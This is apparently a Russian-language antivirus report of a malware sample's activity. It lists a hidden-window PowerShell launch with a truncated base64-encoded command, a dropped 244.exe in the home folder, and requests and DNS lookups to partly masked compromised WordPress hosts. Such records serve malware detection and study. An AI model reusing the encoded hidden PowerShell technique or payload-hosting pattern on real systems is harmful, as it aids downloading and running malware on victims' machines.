Техническая информация
- '<SYSTEM32>\wisptis.exe' /ManualLaunch;
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABCAGkAZwBqAHkAawBoAGgAaQBnAG0AbQA9ACcAQQB0AGEAdgBkAGcAbwBoAGwAeAByACcAOwAkAEkAbgBkAGgAawBtAHEAaQAgAD0AIAAnADIANAA0ACcAOwAkAEwAYgBpAGcAeQBmAGIAegB0AHQAbQBjAD0AJwBBAHcAcgB3AGEAbQBoAHIAbAB...
- %HOMEPATH%\244.exe
- %HOMEPATH%\244.exe
- %HOMEPATH%\244.exe
- http://fz###brouki.com/wp-admin/9ux03-llvf2yxgk2-0899614085/
- http://fz###brouki.com/cgi-sys/suspendedpage.cgi
- http://www.si###nzarte.es/wp-admin/lmuj70ze63-me0fwle5-4159/
- http://www.si###nzarte.es/cgi-sys/suspendedpage.cgi
- http://www.th#######applianceservice.com/rtqh/ZyzXzTiD/
- DNS ASK fz###brouki.com
- DNS ASK de####tfull.co.kr
- DNS ASK si###nzarte.es
- DNS ASK as########1209.000webhostapp.com
- DNS ASK th#######applianceservice.com
- '<SYSTEM32>\wisptis.exe' /ManualLaunch;' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABCAGkAZwBqAHkAawBoAGgAaQBnAG0AbQA9ACcAQQB0AGEAdgBkAGcAbwBoAGwAeAByACcAOwAkAEkAbgBkAGgAawBtAHEAaQAgAD0AIAAnADIANAA0ACcAOwAkAEwAYgBpAGcAeQBmAGIAegB0AHQAbQBjAD0AJwBBAHcAcgB3AGEAbQBoAHIAbAB...' (со скрытым окном)